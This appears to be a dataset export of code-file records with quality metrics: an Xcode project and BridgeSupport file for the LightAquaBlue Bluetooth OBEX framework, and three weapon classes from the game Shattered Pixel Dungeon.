8DC2EF5A0486A6940098B216 /* Info.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist; path = Info.plist; sourceTree = "<group>"; };
8DC2EF5B0486A6940098B216 /* LightAquaBlue.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = LightAquaBlue.framework; sourceTree = BUILT_PRODUCTS_DIR; };
/* End PBXFileReference section */
/* Begin PBXFrameworksBuildPhase section */
8DC2EF560486A6940098B216 /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
8DC2EF570486A6940098B216 /* Cocoa.framework in Frameworks */,
8100FE1C0D056D4300FA9985 /* IOBluetooth.framework in Frameworks */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXFrameworksBuildPhase section */
/* Begin PBXGroup section */
034768DFFF38A50411DB9C8B /* Products */ = {
isa = PBXGroup;
children = (
8DC2EF5B0486A6940098B216 /* LightAquaBlue.framework */,
);
name = Products;
sourceTree = "<group>";
};
0867D691FE84028FC02AAC07 /* LightAquaBlue */ = {
isa = PBXGroup;
children = (
8100FDFF0D056D0100FA9985 /* LightAquaBlue.h */,
08FB77AEFE84172EC02AAC07 /* Classes */,
32C88DFF0371C24200C91783 /* Other Sources */,
089C1665FE841158C02AAC07 /* Resources */,
0867D69AFE84028FC02AAC07 /* External Frameworks and Libraries */,
034768DFFF38A50411DB9C8B /* Products */,
);
name = LightAquaBlue;
sourceTree = "<group>";
};
0867D69AFE84028FC02AAC07 /* External Frameworks and Libraries */ = {
isa = PBXGroup;
children = (
8100FE1B0D056D4300FA9985 /* IOBluetooth.framework */,
1058C7B0FEA5585E11CA2CBB /* Linked Frameworks */,
1058C7B2FEA5585E11CA2CBB /* Other Frameworks */,
);
name = "External Frameworks and Libraries";
sourceTree = "<group>";
};
089C1665FE841158C02AAC07 /* Resources */ = {
isa = PBXGroup;
children = (
669282170E297230008CB8B0 /* BridgeSupport */,
8100FE000D056D0100FA9985 /* OBEXFileTransferDictionary.plist */,
8100FE010D056D0100FA9985 /* OBEXObjectPushDictionary.plist */,
8100FE020D056D0100FA9985 /* SerialPortDictionary.plist */,
8DC2EF5A0486A6940098B216 /* Info.plist */,
089C1666FE841158C02AAC07 /* InfoPlist.strings */,
);
name = Resources;
sourceTree = "<group>";
};
08FB77AEFE84172EC02AAC07 /* Classes */ = {
isa = PBXGroup;
children = (
810001680D09536000FA9985 /* BBStreamingOutputStream.h */,
810001690D09536000FA9985 /* BBStreamingOutputStream.m */,
8100FDEB0D056D0000FA9985 /* BBBluetoothOBEXClient.h */,
8100FDEC0D056D0000FA9985 /* BBBluetoothOBEXClient.m */,
8100FDED0D056D0000FA9985 /* BBBluetoothOBEXServer.h */,
8100FDEE0D056D0000FA9985 /* BBBluetoothOBEXServer.m */,
8100FDEF0D056D0000FA9985 /* BBStreamingInputStream.h */,
8100FDF00D056D0000FA9985 /* BBStreamingInputStream.m */,
8100FDF10D056D0000FA9985 /* BBLocalDevice.h */,
8100FDF20D056D0000FA9985 /* BBLocalDevice.m */,
8100FDF30D056D0000FA9985 /* BBMutableOBEXHeaderSet.h */,
8100FDF40D056D0000FA9985 /* BBMutableOBEXHeaderSet.m */,
8100FDF50D056D0000FA9985 /* BBOBEXHeaderSet.h */,
8100FDF60D056D0000FA9985 /* BBOBEXHeaderSet.m */,
8100FDF70D056D0100FA9985 /* BBOBEXRequest.h */,
8100FDF80D056D0100FA9985 /* BBOBEXRequest.m */,
8100FDF90D056D0100FA9985 /* BBOBEXRequestHandler.h */,
8100FDFA0D056D0100FA9985 /* BBOBEXRequestHandler.m */,
8100FDFD0D056D0100FA9985 /* BBServiceAdvertiser.h */,
8100FDFE0D056D0100FA9985 /* BBServiceAdvertiser.m */,
817D21A10D3D7FA500469B5D /* BBBluetoothChannelDelegate.h */,
817D21A20D3D7FA500469B5D /* BBBluetoothChannelDelegate.m */,
817D239B0D40313600469B5D /* BBOBEXResponse.h */,
817D239C0D40313600469B5D /* BBOBEXResponse.m */,
);
name = Classes;
sourceTree = "<group>";
};
1058C7B0FEA5585E11CA2CBB /* Linked Frameworks */ = {
isa = PBXGroup;
children = (
1058C7B1FEA5585E11CA2CBB /* Cocoa.framework */,
);
name = "Linked Frameworks";
sourceTree = "<group>";
};
1058C7B2FEA5585E11CA2CBB /* Other Frameworks */ = {
isa = PBXGroup;
children = (
0867D6A5FE840307C02AAC07 /* AppKit.framework */,
0867D69BFE84028FC02AAC07 /* Foundation.framework */,
);
name = "Other Frameworks";
sourceTree = "<group>";
};
32C88DFF0371C24200C91783 /* Other Sources */ = {
isa = PBXGroup;
children = (
32DBCF5E0370ADEE00C91783 /* LightAquaBlue_Prefix.pch */,
);
name = "Other Sources";
sourceTree = "<group>";
};
/* End PBXGroup section */
/* Begin PBXHeadersBuildPhase section */
8DC2EF500486A6940098B216 /* Headers */ = {
isa = PBXHeadersBuildPhase;
buildActionMask = 2147483647;
files = (
8100FE030D056D0100FA9985 /* BBBluetoothOBEXClient.h in Headers */,
8100FE050D056D0100FA9985 /* BBBluetoothOBEXServer.h in Headers */,
8100FE070D056D0100FA9985 /* BBStreamingInputStream.h in Headers */,
8100FE090D056D0100FA9985 /* BBLocalDevice.h in Headers */,
8100FE0B0D056D0100FA9985 /* BBMutableOBEXHeaderSet.h in Headers */,
8100FE0D0D056D0100FA9985 /* BBOBEXHeaderSet.h in Headers */,
8100FE0F0D056D0100FA9985 /* BBOBEXRequest.h in Headers */,
8100FE110D056D0100FA9985 /* BBOBEXRequestHandler.h in Headers */,
8100FE150D056D0100FA9985 /* BBServiceAdvertiser.h in Headers */,
8100FE170D056D0100FA9985 /* LightAquaBlue.h in Headers */,
8100016A0D09536000FA9985 /* BBStreamingOutputStream.h in Headers */,
817D21A30D3D7FA500469B5D /* BBBluetoothChannelDelegate.h in Headers */,
817D239D0D40313600469B5D /* BBOBEXResponse.h in Headers */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXHeadersBuildPhase section */
/* Begin PBXNativeTarget section */
8DC2EF4F0486A6940098B216 /* LightAquaBlue */ = {
isa = PBXNativeTarget;
buildConfigurationList = 1DEB91AD08733DA50010E9CD /* Build configuration list for PBXNativeTarget "LightAquaBlue" */;
buildPhases = (
8DC2EF500486A6940098B216 /* Headers */,
8DC2EF520486A6940098B216 /* Resources */,
8DC2EF540486A6940098B216 /* Sources */,
8DC2EF560486A6940098B216 /* Frameworks */,
);
buildRules = (
);
dependencies = (
);
name = LightAquaBlue;
productInstallPath = "$(HOME)/Library/Frameworks";
productName = LightAquaBlue;
productReference = 8DC2EF5B0486A6940098B216 /* LightAquaBlue.framework */;
productType = "com.apple.product-type.framework";
};
/* End PBXNativeTarget section */
/* Begin PBXProject section */
0867D690FE84028FC02AAC07 /* Project object */ = {
isa = PBXProject;
attributes = {
LastUpgradeCheck = 0430;
};
buildConfigurationList = 1DEB91B108733DA50010E9CD /* Build configuration list for PBXProject "LightAquaBlue" */;
compatibilityVersion = "Xcode 3.2";
developmentRegion = English;
hasScannedForEncodings = 1;
knownRegions = (
en,
);
mainGroup = 0867D691FE84028FC02AAC07 /* LightAquaBlue */;
productRefGroup = 034768DFFF38A50411DB9C8B /* Products */;
projectDirPath = "";
projectRoot = "";
targets = (
8DC2EF4F0486A6940098B216 /* LightAquaBlue */,
);
};
/* End PBXProject section */
/* Begin PBXResourcesBuildPhase section */
8DC2EF520486A6940098B216 /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
8DC2EF530486A6940098B216 /* InfoPlist.strings in Resources */,
8100FE180D056D0100FA9985 /* OBEXFileTransferDictionary.plist in Resources */,
8100FE190D056D0100FA9985 /* OBEXObjectPushDictionary.plist in Resources */,
8100FE1A0D056D0100FA9985 /* SerialPortDictionary.plist in Resources */,
6692821A0E297230008CB8B0 /* BridgeSupport in Resources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXResourcesBuildPhase section */
/* Begin PBXSourcesBuildPhase section */
8DC2EF540486A6940098B216 /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
8100FE040D056D0100FA9985 /* BBBluetoothOBEXClient.m in Sources */,
8100FE060D056D0100FA9985 /* BBBluetoothOBEXServer.m in Sources */,
8100FE080D056D0100FA9985 /* BBStreamingInputStream.m in Sources */,
8100FE0A0D056D0100FA9985 /* BBLocalDevice.m in Sources */,
8100FE0C0D056D0100FA9985 /* BBMutableOBEXHeaderSet.m in Sources */,
8100FE0E0D056D0100FA9985 /* BBOBEXHeaderSet.m in Sources */,
8100FE100D056D0100FA9985 /* BBOBEXRequest.m in Sources */,
8100FE120D056D0100FA9985 /* BBOBEXRequestHandler.m in Sources */,
8100FE160D056D0100FA9985 /* BBServiceAdvertiser.m in Sources */,
8100016B0D09536000FA9985 /* BBStreamingOutputStream.m in Sources */,
817D21A40D3D7FA500469B5D /* BBBluetoothChannelDelegate.m in Sources */,
817D239E0D40313600469B5D /* BBOBEXResponse.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXSourcesBuildPhase section */
/* Begin PBXVariantGroup section */
089C1666FE841158C02AAC07 /* InfoPlist.strings */ = {
isa = PBXVariantGroup;
children = (
089C1667FE841158C02AAC07 /* English */,
);
name = InfoPlist.strings;
sourceTree = "<group>";
};
/* End PBXVariantGroup section */
/* Begin XCBuildConfiguration section */
1DEB91AE08733DA50010E9CD /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
COPY_PHASE_STRIP = NO;
DYLIB_COMPATIBILITY_VERSION = 1;
DYLIB_CURRENT_VERSION = 1;
FRAMEWORK_VERSION = A;
GCC_DYNAMIC_NO_PIC = NO;
GCC_MODEL_TUNING = G5;
GCC_OPTIMIZATION_LEVEL = 0;
GCC_PRECOMPILE_PREFIX_HEADER = YES;
GCC_PREFIX_HEADER = LightAquaBlue_Prefix.pch;
INFOPLIST_FILE = Info.plist;
INSTALL_PATH = "$(HOME)/Library/Frameworks";
PRODUCT_NAME = LightAquaBlue;
WRAPPER_EXTENSION = framework;
ZERO_LINK = YES;
};
name = Debug;
};
1DEB91AF08733DA50010E9CD /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ARCHS = (
ppc,
i386,
);
DYLIB_COMPATIBILITY_VERSION = 1;
DYLIB_CURRENT_VERSION = 1;
FRAMEWORK_VERSION = A;
GCC_GENERATE_DEBUGGING_SYMBOLS = NO;
GCC_MODEL_TUNING = G5;
GCC_PRECOMPILE_PREFIX_HEADER = YES;
GCC_PREFIX_HEADER = LightAquaBlue_Prefix.pch;
INFOPLIST_FILE = Info.plist;
INSTALL_PATH = "$(HOME)/Library/Frameworks";
PRODUCT_NAME = LightAquaBlue;
WRAPPER_EXTENSION = framework;
};
name = Release;
};
1DEB91B208733DA50010E9CD /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ARCHS = "$(NATIVE_ARCH_ACTUAL)";
GCC_WARN_ABOUT_RETURN_TYPE = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
MACOSX_DEPLOYMENT_TARGET = "";
};
name = Debug;
};
1DEB91B308733DA50010E9CD /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ARCHS = "$(NATIVE_ARCH_ACTUAL)";
GCC_WARN_ABOUT_RETURN_TYPE = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
};
name = Release;
};
/* End XCBuildConfiguration section */
/* Begin XCConfigurationList section */
1DEB91AD08733DA50010E9CD /* Build configuration list for PBXNativeTarget "LightAquaBlue" */ = {
isa = XCConfigurationList;
buildConfigurations = (
1DEB91AE08733DA50010E9CD /* Debug */,
1DEB91AF08733DA50010E9CD /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
1DEB91B108733DA50010E9CD /* Build configuration list for PBXProject "LightAquaBlue" */ = {
isa = XCConfigurationList;
buildConfigurations = (
1DEB91B208733DA50010E9CD /* Debug */,
1DEB91B308733DA50010E9CD /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
/* End XCConfigurationList section */
};
rootObject = 0867D690FE84028FC02AAC07 /* Project object */;
}
| 24,461 | project | pbxproj | en | unknown | unknown | {} | 0 | {} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BridgeSupport/LightAquaBlue.bridgesupport | <?xml version='1.0'?>
<!DOCTYPE signatures SYSTEM "file://localhost/System/Library/DTDs/BridgeSupport.dtd">
<signatures version='0.9'>
<depends_on path='/System/Library/Frameworks/Cocoa.framework'/>
<depends_on path='/System/Library/Frameworks/IOBluetooth.framework'/>
<depends_on path='/System/Library/Frameworks/CoreServices.framework'/>
<depends_on path='/System/Library/Frameworks/CoreFoundation.framework'/>
<depends_on path='/System/Library/Frameworks/Foundation.framework'/>
<class name='BBBluetoothOBEXClient'>
<method selector='hasConnectionID'>
<retval type='B'/>
</method>
<method selector='isConnected'>
<retval type='B'/>
</method>
<method selector='sendSetPathRequestWithHeaders:changeToParentDirectoryFirst:createDirectoriesIfNeeded:'>
<arg type='B' index='1'/>
<arg type='B' index='2'/>
</method>
<method class_method='true' selector='setDebug:'>
<arg type='B' index='0'/>
</method>
<method selector='initWithRemoteDeviceAddress:channelID:delegate:'>
<arg index='0' type_modifier='n'/>
</method>
</class>
<class name='BBBluetoothOBEXServer'>
<method class_method='true' selector='setDebug:'>
<arg type='B' index='0'/>
</method>
</class>
<class name='BBLocalDevice'>
<method class_method='true' selector='isPoweredOn'>
<retval type='B'/>
</method>
</class>
<class name='BBMutableOBEXHeaderSet'>
<method selector='addHeadersFromHeadersData:length:'>
<retval type='B'/>
</method>
<method selector='setValueForTimeHeader:isUTCTime:'>
<arg type='B' index='1'/>
</method>
</class>
<class name='BBOBEXHeaderSet'>
<method selector='containsValueForHeader:'>
<retval type='B'/>
</method>
</class>
<class name='BBOBEXRequest'>
<method selector='isFinished'>
<retval type='B'/>
</method>
<method selector='readOBEXResponseHeaders:andResponseCode:fromSessionEvent:'>
<arg index='0' type_modifier='o'/>
<arg index='1' type_modifier='o'/>
<arg index='2' type_modifier='n'/>
<retval type='B'/>
</method>
<method class_method='true' selector='setDebug:'>
<arg type='B' index='0'/>
</method>
</class>
<class name='BBOBEXRequestHandler'>
<method selector='handleRequestEvent:'>
<arg index='0' type_modifier='n'/>
<retval type='B'/>
</method>
<method selector='prepareResponseForRequestWithHeaders:flags:isFinalRequestPacket:'>
<arg type='B' index='2'/>
</method>
<method selector='readOBEXRequestHeaders:andRequestFlags:fromSessionEvent:'>
<arg index='0' type_modifier='n'/>
<arg index='2' type_modifier='n'/>
<retval type='B'/>
</method>
<method class_method='true' selector='setDebug:'>
<arg type='B' index='0'/>
</method>
</class>
<class name='BBOBEXSetPathRequest'>
<method selector='initWithClient:eventSelector:session:changeToParentDirectoryFirst:createDirectoriesIfNeeded:'>
<arg type='B' index='3'/>
<arg type='B' index='4'/>
</method>
</class>
<class name='NSObject'>
<method selector='server:didHandleGetRequestForStream:requestWasAborted:'>
<arg type='B' index='2'/>
</method>
<method selector='server:didHandlePutRequestForStream:requestWasAborted:'>
<arg type='B' index='2'/>
</method>
<method selector='server:didReceiveDataOfLength:isLastPacket:'>
<arg type='B' index='2'/>
</method>
<method selector='server:shouldHandleConnectRequest:'>
<retval type='B'/>
</method>
<method selector='server:shouldHandleDisconnectRequest:'>
<retval type='B'/>
</method>
<method selector='server:shouldHandlePutDeleteRequest:'>
<retval type='B'/>
</method>
<method selector='server:shouldHandleSetPathRequest:withFlags:'>
<retval type='B'/>
</method>
</class>
<class name='BBServiceAdvertiser'>
<method class_method='true' selector='addRFCOMMServiceDictionary:withName:UUID:channelID:serviceRecordHandle:'>
<arg index='3' type_modifier='o'/>
<arg index='4' type_modifier='o'/>
</method>
</class>
</signatures> | 3,707 | LightAquaBlue | bridgesupport | en | unknown | unknown | {} | 0 | {} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Dagger.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Mob;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.utils.Random;
public class Dagger extends MeleeWeapon {
{
image = ItemSpriteSheet.DAGGER;
tier = 1;
bones = false;
}
@Override
public int max(int lvl) {
return 4*(tier+1) + //8 base, down from 10
lvl*(tier+1); //scaling unchanged
}
@Override
public int damageRoll(Char owner) {
if (owner instanceof Hero) {
Hero hero = (Hero)owner;
Char enemy = hero.enemy();
if (enemy instanceof Mob && ((Mob) enemy).surprisedBy(hero)) {
//deals 75% toward max to max on surprise, instead of min to max.
int diff = max() - min();
int damage = augment.damageFactor(Random.NormalIntRange(
min() + Math.round(diff*0.75f),
max()));
int exStr = hero.STR() - STRReq();
if (exStr > 0) {
damage += Random.IntRange(0, exStr);
}
return damage;
}
}
return super.damageRoll(owner);
}
}
| 1,994 | Dagger | java | en | java | code | {"qsc_code_num_words": 266, "qsc_code_num_chars": 1994.0, "qsc_code_mean_word_length": 5.30827068, "qsc_code_frac_words_unique": 0.54511278, "qsc_code_frac_chars_top_2grams": 0.0601983, "qsc_code_frac_chars_top_3grams": 0.13456091, "qsc_code_frac_chars_top_4grams": 0.12464589, "qsc_code_frac_chars_dupe_5grams": 0.16430595, "qsc_code_frac_chars_dupe_6grams": 0.03966006, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01923077, "qsc_code_frac_chars_whitespace": 0.19157472, "qsc_code_size_file_byte": 1994.0, "qsc_code_num_lines": 66.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.21212121, "qsc_code_frac_chars_alphabet": 0.85669975, "qsc_code_frac_chars_comments": 0.4448345, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.05405405, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.05405405, "qsc_codejava_score_lines_no_logic": 0.24324324, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Greatshield.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Greatshield extends MeleeWeapon {
{
image = ItemSpriteSheet.GREATSHIELD;
tier = 5;
}
@Override
public int max(int lvl) {
return Math.round(2.5f*(tier+1)) + //15 base, down from 30
lvl*(tier-2); //+3 per level, down from +6
}
@Override
public int defenseFactor( Char owner ) {
return 10+3*level(); //10 extra defence, plus 3 per level;
}
public String statsInfo(){
if (isIdentified()){
return Messages.get(this, "stats_desc", 10+3*level());
} else {
return Messages.get(this, "typical_stats_desc", 10);
}
}
}
| 1,641 | Greatshield | java | en | java | code | {"qsc_code_num_words": 223, "qsc_code_num_chars": 1641.0, "qsc_code_mean_word_length": 5.29147982, "qsc_code_frac_words_unique": 0.58295964, "qsc_code_frac_chars_top_2grams": 0.05762712, "qsc_code_frac_chars_top_3grams": 0.12881356, "qsc_code_frac_chars_top_4grams": 0.04830508, "qsc_code_frac_chars_dupe_5grams": 0.06949153, "qsc_code_frac_chars_dupe_6grams": 0.04745763, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02919162, "qsc_code_frac_chars_whitespace": 0.18586228, "qsc_code_size_file_byte": 1641.0, "qsc_code_num_lines": 53.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.96226415, "qsc_code_frac_chars_alphabet": 0.85404192, "qsc_code_frac_chars_comments": 0.52955515, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07692308, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.03626943, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.11538462, "qsc_codejava_score_lines_no_logic": 0.26923077, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/WarHammer.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class WarHammer extends MeleeWeapon {
{
image = ItemSpriteSheet.WAR_HAMMER;
tier = 5;
ACC = 1.20f; //20% boost to accuracy
}
@Override
public int max(int lvl) {
return 4*(tier+1) + //24 base, down from 30
lvl*(tier+1); //scaling unchanged
}
}
| 1,203 | WarHammer | java | en | java | code | {"qsc_code_num_words": 172, "qsc_code_num_chars": 1203.0, "qsc_code_mean_word_length": 5.09883721, "qsc_code_frac_words_unique": 0.68023256, "qsc_code_frac_chars_top_2grams": 0.03762828, "qsc_code_frac_chars_top_3grams": 0.04446978, "qsc_code_frac_chars_top_4grams": 0.0649943, "qsc_code_frac_chars_dupe_5grams": 0.09350057, "qsc_code_frac_chars_dupe_6grams": 0.06385405, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03080082, "qsc_code_frac_chars_whitespace": 0.19035744, "qsc_code_size_file_byte": 1203.0, "qsc_code_num_lines": 40.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.075, "qsc_code_frac_chars_alphabet": 0.86960986, "qsc_code_frac_chars_comments": 0.7032419, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07142857, "qsc_codejava_score_lines_no_logic": 0.21428571, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, 